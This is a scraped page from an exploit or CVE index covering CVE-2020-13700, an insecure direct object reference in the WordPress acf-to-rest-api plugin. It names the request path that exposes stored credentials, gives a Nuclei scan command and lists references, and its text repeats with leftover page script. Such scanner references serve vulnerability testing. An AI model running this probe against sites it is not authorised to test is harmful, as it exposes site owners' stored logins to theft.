.. / CVE-2020-13700

Exploit for WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference (CVE-2020-13700)

Description:

WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.

Nuclei Template

View the template here CVE-2020-13700.yaml

Validate with Nuclei

echo "$URL" | nuclei -t ~/nuclei-templates/http/cves/2020/CVE-2020-13700.yaml

References:

https://github.com/ARPSyndicate/cvemon
https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
https://wordpress.org/plugins/acf-to-rest-api/#developers
https://nvd.nist.gov/vuln/detail/CVE-2020-13700
https://github.com/airesvsg/acf-to-rest-api

.. / CVE-2020-13700 if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }

Exploit for WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference (CVE-2020-13700)

Description:

Nuclei Template

Validate with Nuclei

.. / CVE-2020-13700